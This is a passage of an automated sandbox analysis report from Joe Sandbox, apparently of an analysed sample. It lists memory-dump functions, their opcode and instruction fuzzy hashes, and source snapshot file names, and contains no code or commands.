                                                      • Snapshot File: hcaresult_16_2_7ff848e70000_TJXpRilNkh.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7b5c40bd6f8e144eb4d3d04f2c084c46bb52f47291556595e0dbf9a16619b801
                                                      • Instruction ID: 82d149f134ea44ad30d1b4db372d21606c912cc1c046034b85e5eaea7050f871
                                                      • Opcode Fuzzy Hash: 7b5c40bd6f8e144eb4d3d04f2c084c46bb52f47291556595e0dbf9a16619b801
                                                      • Instruction Fuzzy Hash: 9041B422D0DBDA5FE70AA76898611F97BB1FF42291F4800F7C049DB1D3DE29280A8755
                                                      Function 00007FF848E70C0E Relevance: .2, Instructions: 188COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000010.00000002.3325865278.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_16_2_7ff848e70000_TJXpRilNkh.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a3a218a022f020c43150bacefee5e1759002d4b1902db966723719b49392d815
                                                      • Instruction ID: 0d8c8c0607d57ad598d261a52c2f9edd66dfafb9e318af59f17dec0667f45209
                                                      • Opcode Fuzzy Hash: a3a218a022f020c43150bacefee5e1759002d4b1902db966723719b49392d815
                                                      • Instruction Fuzzy Hash: C7513421A1EBCA5FE397A77C48192757FE2EF87690B0900FAD489C7193DD1C6C468352
                                                      Function 00007FF848E70558 Relevance: .1, Instructions: 137COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000010.00000002.3325865278.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_16_2_7ff848e70000_TJXpRilNkh.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: cda8bcf193d581c393c6c992edafeec84d1f36f9e1b87a55a0ba89749d99e524
                                                      • Instruction ID: 5d72a6262e5781ac8f182e5bb133af5b4c5b8cb557883ae9aa5718de90ab564e
                                                      • Opcode Fuzzy Hash: cda8bcf193d581c393c6c992edafeec84d1f36f9e1b87a55a0ba89749d99e524
                                                      • Instruction Fuzzy Hash: B431A220B1D9495FE798EA3C5469279A7D2EB98751F0405BAE00EC3297DE689C028345
                                                      Function 00007FF848E70AA9 Relevance: .1, Instructions: 124COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000010.00000002.3325865278.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_16_2_7ff848e70000_TJXpRilNkh.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1b0aff5e7aba280b64a639e21c8308387798c950d9358660dde5abbc1a4394e8
                                                      • Instruction ID: e22cde0177129c03b399f31eb327f7e58d24dcecf337e2b2e26236837c81a436
                                                      • Opcode Fuzzy Hash: 1b0aff5e7aba280b64a639e21c8308387798c950d9358660dde5abbc1a4394e8
                                                      • Instruction Fuzzy Hash: 2331C321F18E499FE788B7BC585A3B9B7D1FF98751F14417AE00DC3292DE2898418792
                                                      Function 00007FF848E70961 Relevance: .1, Instructions: 115COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000010.00000002.3325865278.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_16_2_7ff848e70000_TJXpRilNkh.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4d38febce8217884d7df8923b3df6c2f71b92264384f72018c9f287ebc5deab2
                                                      • Instruction ID: b658d8801d6b38ce3de15d66b6691557352037bfa2aaf3fe536d423d38788c78
                                                      • Opcode Fuzzy Hash: 4d38febce8217884d7df8923b3df6c2f71b92264384f72018c9f287ebc5deab2
                                                      • Instruction Fuzzy Hash: 8631C270E19A0E9FEB48FBA8D4656FDB7E1FF98340F544579D009D3286DE38A8418B50
                                                      Function 00007FF848E7082D Relevance: .1, Instructions: 98COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000010.00000002.3325865278.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_16_2_7ff848e70000_TJXpRilNkh.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 47afedf5dc0299ef71e6e53f672dc8cca45f535bd9e80300cfa2657947540bee
                                                      • Instruction ID: ba81e67d8d26aebb0003fd622bba91d512578cceae6d4611a5541721b3c3362c
                                                      • Opcode Fuzzy Hash: 47afedf5dc0299ef71e6e53f672dc8cca45f535bd9e80300cfa2657947540bee
                                                      • Instruction Fuzzy Hash: 8531E13290EA895FE749EF6884991A87FA1FF85380B8540B9D00D8338ADE34B901C792
                                                      Function 00007FF848E723A1 Relevance: .1, Instructions: 51COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000010.00000002.3325865278.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_16_2_7ff848e70000_TJXpRilNkh.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5abe91283f757e4be36b09c63b411efc883e1713ebf82e432be4babc25cf4c7e
                                                      • Instruction ID: 7a35fb4529457e5de26ccbdddac3ab17ac470365b5787e4905c2c4c77fc0d2da
                                                      • Opcode Fuzzy Hash: 5abe91283f757e4be36b09c63b411efc883e1713ebf82e432be4babc25cf4c7e
                                                      • Instruction Fuzzy Hash: 38017B1590CB961FF345B6382C590717FE1EF91291F4804BBE88AC3197EE1469458352